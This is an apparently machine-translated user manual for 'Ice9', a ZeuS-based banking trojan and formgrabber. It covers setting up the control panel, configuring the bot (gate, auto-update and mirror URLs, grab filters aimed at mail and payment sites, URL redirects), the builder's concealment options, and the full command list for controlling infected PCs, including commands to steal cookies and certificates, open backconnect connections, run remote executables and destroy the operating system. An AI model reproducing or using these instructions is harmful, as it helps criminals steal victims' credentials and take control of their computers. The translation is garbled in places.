================================================== ================== BRIEF DESCRIPTION OF THE ================================================== ================== Ice9 new bot formgrabber like ZeuS. Was based on second line version of ZeuS and was redesigned and improved quality. The main task was to increase relative to its progenitor otstuka and the task was successfully accomplished. Improved round proactive protection and firewalls. The same treatment was subjected to injection technology allows injection produce work much more stable. Boat is constantly evolving and updated. ================================================== ================== FUNCTIONAL ================================================== ================== Keylogging -Grabbing http and https form data, and inject its code into Internet Explorer and browsers on its engine (AOL, Maxton, etc.), Mozilla FireFox -Grabbing cookies. Sol files and saved form data -Grabing-FTP clients: FlashFXP, Total Commander, WsFTP 12, FileZilla 3, FAR Manager 1,2, WinSCP 4.2, FTP Commander, CoreFTP, SmartFTP -Grabbing Windows Mail, Live Mail, outlook -Socks-with the possibility of backconnect Screenshots in real time as well as the ability to set response when viewing a particular URL -Obtain certificates from the repository "MY" (certificates marked "Do not exportable" is not exported correctly), and its treatment. After that, any imported certificate will be stored on the server. -Sniffer for TCP traffic -Wide range of commands to control the infected PCs -VNC module ================================================== ================== PROCEDURE ================================================== ================== The installation procedure consists of 2 parts: a) To install the server part (control panel, bot) b) the configuration of the bot -Installing the server side: Fill the folder with the server to the server and set the directory system CHMOD 777 Create a MySQL database Run the script install / index.php in the folder with the server to the server-drenched and follow the online instructions Note: need to have the php module mb_strings -Configuration procedure bot: Boat has a configuration file settings.txt where all the necessary settings for it to work. The settings file is divided into several sections: Settings (basic settings) {"Settings" ; Path to self-bot (bot download this EXE if newer config version was created and trying to self-update) autoupdate_path "http://localhost/bot.exe" ; Gate Way to the admin (the path through which the bot passes the information to the Control Panel) receiving_script_path "http://localhost/script.php" ; File name with injects injects_file "injects.txt" ; Data filters grabbing (the format is fully compatible with the format of Zeus) {"DataGrabFilters" ; "Http://mail.rambler.ru/ *" "passw; login" } ; Fake hidden URI redirect (format is fully compatible with the format of Zeus) {"URLRedirects" ; "Http://www.rambler.ru" "http://www.yandex.ru" "GP" "" "" } ; Ways to backup config files (in case of unavailability of the main config the bot will attempt to download and use the backup configuration file) {"MirrorServers" "Http://advdomain/cfg1.bin" } ; URI mask {"URLMasks" "Nhttp: / / * odnoklassniki.ru / *" "Nhttp: / / vkontakte.ru / *" "S * / login.osmp.ru / *" "S * / atl.osmp.ru / *" } } The list of available masks URI: N - do not write data in reports S - make screenshot with mouse clicks on the page area matches the URI of the mask C - the preservation of all cookies associated with that URI and blocking access to it B - blocking access to the URI ================================================== ================== DESCRIPTION OF WORK Builder ================================================== ================== - Creating a bot: (not available for tethered to the host version) Setting's path - the path to the configuration file Botnet's name - the name of a botnet Settings retrieve timeout - intrerval between bot download settings from the server Statistics retrieve timeout - intrerval between the sending of reports to the server RC4 encryption key - the encryption key (must match the key in the admin) Remove certificate - Remove certificates when establishing a bot Disable TCP - disable TCP-server (socks server, the screenshots in real time) - increases the concealment - Create a configuration file: RC4 encryption key - the encryption key (must match the key in the admin) Settings file - the path to configuration file - Find and remove the bot from the system: Enter the RC4 encryption key at the bottom of the window. If your system features a bot with the same key is the delete button will be available. ================================================== ================== A list of commands the bot (team prescribed in section admin scripts) ================================================== ================== Working with the OS. os_shutdown - Shut down the computer os_reboot - Reboot the computer Working with a bot. bot_uninstall - Unload boat from the computer bot_update [url] - Scan bot bot_update_exe [url] - Update the bot bot_bc_add [service] [ip] [port] - Create a back-Connect connection with the bot bot_bc_remove [service] [ip] [port] - Remove back-soednenie connection with the bot bot_httpinject_disable [url_mask] - Turn off injection produce a bot bot_httpinject_enable [url_mask] - Add a performance injection produce a bot Working with the user. user_destroy - Kill Operatio System of bot user_logoff - Terminate a user session bot user_execute [url] - Run the executable file on your computer, this command has updated the bot exe user_cookies_get - Get a cookie from your computer bot user_cookies_remove - Remove the cookies from your computer bot user_certs_get - Get a certificate from a computer bot user_certs_remove - Delete certificate from a computer bot user_url_block [url_mask] - Block URL user_url_unblock [url_mask] - Unblock URL user_homepage_set [url] - Set the URL as a homepage bot user_flashplayer_get - Get SOL files from a computer bot user_flashplayer_remove - SOL Delete files from computer bot